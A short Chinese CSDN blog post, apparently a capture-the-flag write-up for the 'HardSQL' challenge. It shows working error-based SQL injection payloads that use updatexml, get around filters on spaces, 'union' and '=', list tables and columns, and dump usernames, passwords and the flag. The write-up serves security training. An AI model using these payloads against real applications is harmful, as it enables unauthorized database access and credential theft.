[极客大挑战 2019]HardSQL

打开题目:

随便输入一个用户名密码,提示密码错误,但是输入1' union select 1,2,3#,显示的是不同的语句

经检查,发现空格被过滤了,所以我们需要用括号来代替空格

而且由于union被过滤了,所以想到了updataxml函数,具体可参考这篇文章

updatexml函数_m0_62092622的博客-CSDN博客https://blog.csdn.net/m0_62092622/article/details/122721621?spm=1001.2014.3001.5501

等号 " = " 也被过滤了,所以考虑用like替代,先查询表1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),'~'),1))#

继续查询列名,1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),'~'),1))#

查询数据1'or(updatexml(1,concat('~',(select(group_concat(username,'~',password))from(H4rDsq1)),'~'),1))#

 可是这里可能显示长度有限,所以flag并未显示全

right()语句可以从右往左查

继续查询右部分1'or(updatexml(1,concat('~',(select(group_concat((right(password,20))))from(H4rDsq1)),'~'),1))#

拼接得出flag

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值